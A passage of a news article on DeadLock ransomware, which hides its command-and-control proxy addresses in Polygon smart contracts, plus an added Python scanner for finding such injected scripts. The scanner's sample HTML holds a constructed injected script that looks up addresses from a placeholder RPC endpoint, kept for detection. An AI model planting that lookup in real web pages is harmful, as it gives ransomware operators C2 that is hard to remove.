discovered ransomware family is weaponizing blockchain technology to build a resilient command-and-control (C2) infrastructure that security teams cannot easily remove.

Group-IB cybersecurity researchers have revealed that the DeadLock ransomware, first identified in July 2025, stores proxy server addresses within Polygon smart contracts.

This technique allows operators to continuously replace the connection points between victims and attackers, effectively neutralizing traditional blocking methods.

Despite its high technical sophistication, DeadLock maintains an unusually low profile by operating quietly without leveraging affiliate programs or public data leak sites.

What sets DeadLock apart

Unlike typical ransomware groups that publicly shame victims, DeadLock threatens to sell stolen data on underground markets.

The malware inserts JavaScript code into HTML files to communicate with smart contracts on the Polygon network.

These smart contracts serve as a decentralized repository of proxy addresses, and the malware retrieves them through read-only blockchain calls, which incur no transaction fees.
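As an added defensive example (not code from Group-IB or from this article), the following Python scanner flags inline scripts in HTML files that perform a read-only EVM JSON-RPC call together with a contract address, the lookup pattern described above. The sample HTML, RPC endpoint, contract address and function selector are constructed placeholders, and the use of the `eth_call` method is an assumption drawn from the article's description of fee-less read-only calls.

```python
import re
from html.parser import HTMLParser

# Constructed sample: one benign inline script and one injected script that
# performs a fee-less read-only JSON-RPC call (eth_call, assumed) against a
# Polygon RPC endpoint. All values are placeholders, not real indicators.
SAMPLE_HTML = """<html><body>
<script>document.title = "hello";</script>
<script>
fetch("https://polygon-rpc.example/", {method: "POST", body: JSON.stringify({
 jsonrpc: "2.0", id: 1, method: "eth_call",
 params: [{to: "0x000000000000000000000000000000000000dead", data: "0x01020304"}, "latest"]})})
 .then(r => r.json()).then(j => connect(j.result));
</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collects the bodies of inline <script> elements, in document order."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script content may arrive in several chunks; concatenate them.
        if self._in_script:
            self.scripts[-1] += data


READ_ONLY_RPC = re.compile(r"\beth_call\b")          # read-only EVM call method
EVM_ADDRESS = re.compile(r"0x[0-9a-fA-F]{40}")        # 20-byte contract/account address
RPC_HOST = re.compile(r"https?://[^\"'\s]*polygon[^\"'\s]*", re.I)  # Polygon RPC URL


def find_suspicious_scripts(html):
    """Return one finding per inline script that combines a read-only
    JSON-RPC call with a contract address; each finding lists the addresses
    and any Polygon RPC endpoints so they can be blocked or hunted for."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, body in enumerate(parser.scripts):
        if READ_ONLY_RPC.search(body) and EVM_ADDRESS.search(body):
            findings.append({
                "script_index": idx,
                "contracts": sorted(set(EVM_ADDRESS.findall(body))),
                "rpc_endpoints": RPC_HOST.findall(body),
            })
    return findings
```

Run it over every HTML file in a web root and treat any finding as a candidate injection to review; a legitimate page that embeds a wallet or dApp client can produce the same pattern, so the result is a triage lead rather than a verdict.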

Researchers have identified at least three variants of DeadLock, with the latest version integrating Session encrypted messaging to communicate directly with victims.


Why blockchain-based attacks are significant

This approach directly reflects the 'EtherHiding' technique documented by Google Threat Intelligence in October 2025, after observing North Korean-linked actors using a similar method.

Group-IB analyst Xabier Eizaguirre described the use of smart contracts to relay proxy addresses as 'an interesting method that allows attackers to virtually infinitely adapt and apply this technique.'

Because data stored on a public blockchain cannot be seized or taken offline the way a traditional server can, removing this infrastructure is extremely difficult.

Files encrypted by DeadLock have their extensions changed to ".dlock", and its PowerShell scripts disable Windows services and delete shadow copies.
